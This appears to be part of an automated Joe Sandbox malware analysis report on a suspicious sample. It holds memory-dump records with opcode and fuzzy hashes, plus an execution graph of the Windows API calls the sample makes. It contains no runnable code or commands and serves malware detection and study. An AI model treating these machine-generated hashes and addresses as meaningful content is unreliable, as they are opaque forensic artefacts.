                                            • Opcode Fuzzy Hash: d5da63f6ab878890f6edcac8521fb9b5a6bb5ae8f2120fb668c5c4d3b8e36905
                                            • Instruction Fuzzy Hash: 1E916035A00205DFDB15CFA8D584AADBBF2EF88314F158469E60AE73A6DB35DC41CB90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0010bfd0d33238837b70bde5bd0f823153d4756f1e3aff676bd3eabb43cce2ff
                                            • Instruction ID: dd1ee5e51acf5d93833235aa3a157dee2bcdf1634f0462cc231b237377196dec
                                            • Opcode Fuzzy Hash: 0010bfd0d33238837b70bde5bd0f823153d4756f1e3aff676bd3eabb43cce2ff
                                            • Instruction Fuzzy Hash: A141EE70112241CFCB0AEF28F984E453F6AFB55305B0492BDD1056B239DB7CAD89DB92
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d2b31beaa7526871eb4bea9699d704c25daa57167d3e7242b844a962660bf04
                                            • Instruction ID: 8b2536ef4c7ab2cbced12a4aaac4b209116114bd52f38b6d289fa4e0ec549f5c
                                            • Opcode Fuzzy Hash: 7d2b31beaa7526871eb4bea9699d704c25daa57167d3e7242b844a962660bf04
                                            • Instruction Fuzzy Hash: 98315035A10206DBDB1ADFA5D49869EFBF2EF89310F148529E805E7390DB74EC46CB90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79dd3b8ad2fc6775ea75e2c7fb8e25b77cdf8db52f3d825fafcacb37702869d7
                                            • Instruction ID: fa3b287c8365e0f32439dc1eb3b45b6b3647bfdf3d93234cb1a63cd0954f31cb
                                            • Opcode Fuzzy Hash: 79dd3b8ad2fc6775ea75e2c7fb8e25b77cdf8db52f3d825fafcacb37702869d7
                                            • Instruction Fuzzy Hash: 54313C34600315CFEB1AEF38C9586AEB7F6AF49244F1004ACD545AB395EB3ADD81CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 359e35376e40f7e6cbd20e824d7062af400b56758f5b866190a13167e8897631
                                            • Instruction ID: b9e91f39256baf87cec95865dc25cc3811c1b378f7f426869c45ffb9221ccffb
                                            • Opcode Fuzzy Hash: 359e35376e40f7e6cbd20e824d7062af400b56758f5b866190a13167e8897631
                                            • Instruction Fuzzy Hash: 5C315034A10205DBDB1ADFA9D45869EFBF2BF89310F14C529E806E7390DB70AC46CB90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 275d7d0be17af7b5dc1d3b18b6db50a7eb5348632a4257f890eb182dd2ee7137
                                            • Instruction ID: df22f1087245785d6979c0f3f9c2fc315989310ead89f982d54045109f8f58a1
                                            • Opcode Fuzzy Hash: 275d7d0be17af7b5dc1d3b18b6db50a7eb5348632a4257f890eb182dd2ee7137
                                            • Instruction Fuzzy Hash: BC311E34700315CFDB1AEB78C5546ADB7F6AF49244F1004A8D545AB394EF3ADC81CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f7c74da091f2a80fb9a01a1bcc2f9c61fc1603cb71e8f0e152a4bc6c0cc4ab4
                                            • Instruction ID: 2316b8cc6d5d700224248b39982243cac8a624bf54c0aedc5e8c9c9b848e7108
                                            • Opcode Fuzzy Hash: 6f7c74da091f2a80fb9a01a1bcc2f9c61fc1603cb71e8f0e152a4bc6c0cc4ab4
                                            • Instruction Fuzzy Hash: 95218172E00206CBDF229EADD88076EF7E5FB85614F20482AD61DD73C6D635E945C782
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 076077f38645ccebe3abe51cea2cad1cd85a210969a1058f38eca34afa4ff9bf
                                            • Instruction ID: 69cb03e15e79b03a5f41a593cd280146c775657fa860a9a7e37f250b63ecd991
                                            • Opcode Fuzzy Hash: 076077f38645ccebe3abe51cea2cad1cd85a210969a1058f38eca34afa4ff9bf
                                            • Instruction Fuzzy Hash: 0D212A347002158FC709AF79E45862E77ABEF88704F20846CE50A9B3A5CF399C46CB92
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa5430edeba8061552597c509756f0c6059af2a533bca0c8f954796183685d34
                                            • Instruction ID: e602359f1046edd59806465ad8a8edb7fb2a9416cf0af6d04bac07eb1501eb22
                                            • Opcode Fuzzy Hash: aa5430edeba8061552597c509756f0c6059af2a533bca0c8f954796183685d34
                                            • Instruction Fuzzy Hash: 9C318271E10206DBDB0ACFA5D49469EF7B2BF89304F14C519D509EB391DB749842CB40
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 171839be3b5ceef4003c15867674792ed0002ce9507bb010fa4b9952de0971b3
                                            • Instruction ID: 7d5ad3521b53ca1bf74c14a34ff8e39d57d16a70885af9f31f8061ccc0348529
                                            • Opcode Fuzzy Hash: 171839be3b5ceef4003c15867674792ed0002ce9507bb010fa4b9952de0971b3
                                            • Instruction Fuzzy Hash: 88217370E1020ADBDB06CF65D49469EFBB6FF85304F14C529E509EB391DB719841CB90
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5de0bd83a031b58f2edd37a17ec10233442535a743efbf798573e9a2b1e6b79b
                                            • Instruction ID: 0514ba9e3d2b5c056127cd45a245a821a965b26aba64efce4c9763f26b5de58c
                                            • Opcode Fuzzy Hash: 5de0bd83a031b58f2edd37a17ec10233442535a743efbf798573e9a2b1e6b79b
                                            • Instruction Fuzzy Hash: 3A21C171E0430ADBCB1ACFA5C44069EF7F2AF89314F10852AE919F7782DB709942CB50
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 665fe97ee7cab2d8739990c2562ac7c7c907006f63bc327eaa41500bb9b16e99
                                            • Instruction ID: 547e0949f38cac8c93f233ebcaf4932109c2c2a1ef2e3967edd462a55e37aa24
                                            • Opcode Fuzzy Hash: 665fe97ee7cab2d8739990c2562ac7c7c907006f63bc327eaa41500bb9b16e99
                                            • Instruction Fuzzy Hash: 88217F306002019FDB27EF68EC84B19B7AAEB45305F405975D405DB2B6EB3CDC8A8B91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490057208.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_141d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                            • Instruction ID: b89a43b5511a58358fded97e3ab66be961c60cc0836c884137452e90a23a4b91
                                            • Opcode Fuzzy Hash: 01d16551a1560dd581fe7c9b729e6ad39358584948cbf640279569c44d70a989
                                            • Instruction Fuzzy Hash: 882125F5A04200DFCB15DF68D988B16BF65FB84318F20C56ED90A0B36AC33AD407CA61
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 251aecebc6311edd35d3461c4582ae7fbf650d1eee490ba82a1f3900b2e323bc
                                            • Instruction ID: b62463dcfe195481f0ae16d27ba6fe9e1757628560d7637165f098dc60ab6ffb
                                            • Opcode Fuzzy Hash: 251aecebc6311edd35d3461c4582ae7fbf650d1eee490ba82a1f3900b2e323bc
                                            • Instruction Fuzzy Hash: 07213B30B44345CFEB26DB28C6586ADB7F2AB89314FA005A8D506EB2D0DB35DE41CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee6ece1a3ce8e5cc1c2a7833c17004264ff5c7641539afd9fe9d4a1d061fae8b
                                            • Instruction ID: 5a226b346e44ee283fe1ea4794bb3a46d60527c45680e8c4bd09cdf3392af6e8
                                            • Opcode Fuzzy Hash: ee6ece1a3ce8e5cc1c2a7833c17004264ff5c7641539afd9fe9d4a1d061fae8b
                                            • Instruction Fuzzy Hash: F2212874700205CFDB25DF78D558A9EB7F1EB49300F5044A8E506EB3A1EB3A9D41CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b5933a9827f44693344572a473988b5dabd45cc9116c3fa74128b18908acef4
                                            • Instruction ID: 7df3e3e9cdccc49745414fe5c6e4b969963cacf31e13b282a7b347c3a2e4c438
                                            • Opcode Fuzzy Hash: 8b5933a9827f44693344572a473988b5dabd45cc9116c3fa74128b18908acef4
                                            • Instruction Fuzzy Hash: CD219D70A41601CBEB376B6CE84472DF7A6EB46322F900839E406D77E1DA2DCC868742
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b63205304bd72817a06291f8ec58493c50ef1aebea7d1a7155a59664a24786c4
                                            • Instruction ID: a153c6363fea1db3c00de8bd1d052f87f5ab6c2ec6b0203b83acd0feb40b6378
                                            • Opcode Fuzzy Hash: b63205304bd72817a06291f8ec58493c50ef1aebea7d1a7155a59664a24786c4
                                            • Instruction Fuzzy Hash: 91219231E0470ADBCB1ACFA5C45469EF7F2AF89314F10851AE919F7382DB709841CB51
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45d3d295d8986ee54820df9f531701a4c0676057dc24427e1a37ab7f5eefa0f7
                                            • Instruction ID: 7ad1960b0d28d9b484a10472be41db03d1118014b59229ba367e83bf634166fc
                                            • Opcode Fuzzy Hash: 45d3d295d8986ee54820df9f531701a4c0676057dc24427e1a37ab7f5eefa0f7
                                            • Instruction Fuzzy Hash: 9921FC70B40305CFDB16DB68C6586AEB7F6AB49300F6004A8D506EB2E4DF35DE41CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82d444f4838f396df971aaaaac9836fd0526c257a706225181d8ae80053b29f
                                            • Instruction ID: 9c6562942d87b848a4a577d4b0c883353a7fdb8533cbf23503734650eb7e16e9
                                            • Opcode Fuzzy Hash: a82d444f4838f396df971aaaaac9836fd0526c257a706225181d8ae80053b29f
                                            • Instruction Fuzzy Hash: 7F215E306402018FDB27EF68EC84B19B79AEB45315F505975D40ADB2B6DB3CDC868B91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7322b7f29a4967f87599857e29928532e473c091beb1d3392d9522905c330fde
                                            • Instruction ID: d4ff6e7dda93d2b85893cf5e1d833ca5ad5386750e8984d3ece2d04996c84ee9
                                            • Opcode Fuzzy Hash: 7322b7f29a4967f87599857e29928532e473c091beb1d3392d9522905c330fde
                                            • Instruction Fuzzy Hash: AA21F874700205CFDB25EF78D658A9EB7F1EB48300F5044A8E506EB3A5EB3A9D41CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490057208.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_141d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                            • Instruction ID: 60f5de3a361db47b3047c738f9cd5b45ed907235d08723096f08b53c480470c9
                                            • Opcode Fuzzy Hash: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                            • Instruction Fuzzy Hash: 0D2192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8089b22e96c402bf2cb17f43584756f107da3120a434d902f2aca5a2d91a56e
                                            • Instruction ID: 495420043841ac99e59ca2765bd8c17ed2e781bd32582b1480a705d7b019fa72
                                            • Opcode Fuzzy Hash: a8089b22e96c402bf2cb17f43584756f107da3120a434d902f2aca5a2d91a56e
                                            • Instruction Fuzzy Hash: B1116030B94304CFEF675A7DE404769B6D5FB852A4F10497AE406DB3E2DA29CE818BC1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ae368a5e866598c7ad11f44fc5104d780c67e9fa08d028872be73b9b98b88f9
                                            • Instruction ID: 1901b0ca7f3bbe1b98fd24ef7c531b7552dbf1adb633594a3acc74f2f3c6046e
                                            • Opcode Fuzzy Hash: 4ae368a5e866598c7ad11f44fc5104d780c67e9fa08d028872be73b9b98b88f9
                                            • Instruction Fuzzy Hash: 53119430A90304DFEF275A69A40076EB6D5FB812B4F10493AF406DB2D2D929CE818BC1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7657f44bbc06eb131720ae65ad18fb34573b126fb91c86e4f207094179d275f
                                            • Instruction ID: 69834005987a7af8030fe5f4a8a81175db65155ced9bbb3ed696b9419b3646de
                                            • Opcode Fuzzy Hash: b7657f44bbc06eb131720ae65ad18fb34573b126fb91c86e4f207094179d275f
                                            • Instruction Fuzzy Hash: 77118276F406119FCB12ABB89C4865E7BF6EB88760F104569DA09D3381EA38DD128BD1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8968b8eab429e9d9d1202bd71e31f08c4ec1877d252f826bace04dd524cc74c6
                                            • Instruction ID: 2a5df96d214f95369b886373f64181243aeaa4c6dcefc373842754edb647b520
                                            • Opcode Fuzzy Hash: 8968b8eab429e9d9d1202bd71e31f08c4ec1877d252f826bace04dd524cc74c6
                                            • Instruction Fuzzy Hash: 13118E71A00315CBCF26EFB888446AEBBF4EF48264B5600B9E805E7381E735D941CBA5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea54f9316dc04024e186f310cebc32ecc893be82dd563941a9dd2c79390815a6
                                            • Instruction ID: 056bd7891207e67986ef9d0816b50fed90a0f0bf88c6b1a4b9fe8af706602bbc
                                            • Opcode Fuzzy Hash: ea54f9316dc04024e186f310cebc32ecc893be82dd563941a9dd2c79390815a6
                                            • Instruction Fuzzy Hash: 27016D31A00315CFCF22EFB884442ADBBE4AB48264B5504BAE805E7391E735D941CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc22efd0a6a8f093814799fe37457b41251c3081a46b69a03f08ee257d48a3b9
                                            • Instruction ID: 035814654a4e83e5c0f7b84b3a84aa471637d61e54b56a5d57cca899fc08bc41
                                            • Opcode Fuzzy Hash: bc22efd0a6a8f093814799fe37457b41251c3081a46b69a03f08ee257d48a3b9
                                            • Instruction Fuzzy Hash: 65019630A102058FDB05DF99D98478ABBA5FF94310F548574C94C5B29AD770D945C7D1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5823edd75959a021a4477b49f1f6912d829eff0da0e16b61dcf8603b99c5873b
                                            • Instruction ID: b85881c25b7b7cfecee745a6e6fb25677707ea5fca011b0b233d353a033868be
                                            • Opcode Fuzzy Hash: 5823edd75959a021a4477b49f1f6912d829eff0da0e16b61dcf8603b99c5873b
                                            • Instruction Fuzzy Hash: 72F0F636A04350CBDB238BA884901ACFBE0EE6936579A40DBE805DB2A1D325E902D751
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc3dd359ecc62891e7d9759a6e1c2822fa9eb2c939816c71822e00cc538d25d2
                                            • Instruction ID: 685e1d671aacbf3b1d719f08ddb647a77fa72b660b8ea34205fdb8c29b32dc99
                                            • Opcode Fuzzy Hash: dc3dd359ecc62891e7d9759a6e1c2822fa9eb2c939816c71822e00cc538d25d2
                                            • Instruction Fuzzy Hash: 07018F705101468FCB0AEF78F985A5D3B75EF41209F1046BDC4059B2A6DE39AE4AC781
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6cbeffe962512a0eea9f4812ad765538ee104688fd6f5bb069c92b62e7ea3a2
                                            • Instruction ID: c23d7429ba8bb500da8b47b403c804b17e1296d43fa01309f416a9690c019c6d
                                            • Opcode Fuzzy Hash: b6cbeffe962512a0eea9f4812ad765538ee104688fd6f5bb069c92b62e7ea3a2
                                            • Instruction Fuzzy Hash: 61F03170910109DFCB0AEFB4F94499D7BB9EF40304F5045B9C404AB264DF38AE89CB91

                                            Execution Graph

                                            Execution Coverage:8.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:162
                                            Total number of Limit Nodes:8

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B2B446
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 18dd76d320b812462c3a4b4560373e109a1b90229dff49c42f389941f42d5487
                                            • Instruction ID: 1b3994760968b33aba2f49ebe55c21f0d473a031dfe247508c45928976397f61
                                            • Opcode Fuzzy Hash: 18dd76d320b812462c3a4b4560373e109a1b90229dff49c42f389941f42d5487
                                            • Instruction Fuzzy Hash: 9B714470A00B158FDB24DF6AE144B6ABBF5FF88300F008A6DD48AD7A50DB75E945CB91

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B25D81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ea6ef4ec1a2616e4383fe8bde5739427f26e063a367ab1411efe9302dc3e4710
                                            • Instruction ID: 9e8782bd1ffa1338cb3d9b460f50d8daf137d83f01531965c57bcbf69f534219
                                            • Opcode Fuzzy Hash: ea6ef4ec1a2616e4383fe8bde5739427f26e063a367ab1411efe9302dc3e4710
                                            • Instruction Fuzzy Hash: 5941F2B1C00629CFDB24DFA9C944BDDBBF5BF48304F20806AD418AB261DB75694ACF91
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BA4381
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2103385263.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_4ba0000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 37728b7a2ce05b0a0abda12ca3e2970752683e8d72b7ee79483308d1d667af0c
                                            • Instruction ID: 6c35de3f98323d0f181b5eb50c71817fadcaf2c83a9f8d7724f6dd94d600fd44
                                            • Opcode Fuzzy Hash: 37728b7a2ce05b0a0abda12ca3e2970752683e8d72b7ee79483308d1d667af0c
                                            • Instruction Fuzzy Hash: 2F4127B5A042099FDB14CF99C488AAEFBF5FF88314F24C499D519A7321D375A841CBA0
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B25D81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 964db3454d1f8899139f3a635d47be9ee35bfbb3a11a4670c030007ed4d0c760
                                            • Instruction ID: cfec3dc2b1c2351a4962d718e2a2d5e891e89039ed79f60d7d1fdddb188835c1
                                            • Opcode Fuzzy Hash: 964db3454d1f8899139f3a635d47be9ee35bfbb3a11a4670c030007ed4d0c760
                                            • Instruction Fuzzy Hash: 9541D2B1C00629CBDB24DFA9C944B9DBBF5FF48304F2080AAD418AB255DB75694ACF91
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B2D686,?,?,?,?,?), ref: 00B2D747
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 02ea8d291a609db55e566e226b137a5dd6d07988aa834036b727802f1446022d
                                            • Instruction ID: c3c7c709c2c8499fd79dd394a3a6c1cf7266d239018bd987d50459d0f446a4f4
                                            • Opcode Fuzzy Hash: 02ea8d291a609db55e566e226b137a5dd6d07988aa834036b727802f1446022d
                                            • Instruction Fuzzy Hash: 7421E4B59002189FDB10CF9AD584AEEBFF8FB48314F24841AE919A3310C378A940CFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B2D686,?,?,?,?,?), ref: 00B2D747
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cb7aca4e0ddf707326432c7fd24ab7282cb68b5c1152aab3d27cb4035190f54d
                                            • Instruction ID: ce40a36471e1ccc0ea764cdad5e95fc77999aec77585e00b28c4d415056c39a0
                                            • Opcode Fuzzy Hash: cb7aca4e0ddf707326432c7fd24ab7282cb68b5c1152aab3d27cb4035190f54d
                                            • Instruction Fuzzy Hash: E521E4B59002189FDB10CFAAD584AEEBFF8FB48310F14845AE918A3310D378A940CFA5
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B2B4C1,00000800,00000000,00000000), ref: 00B2B6D2
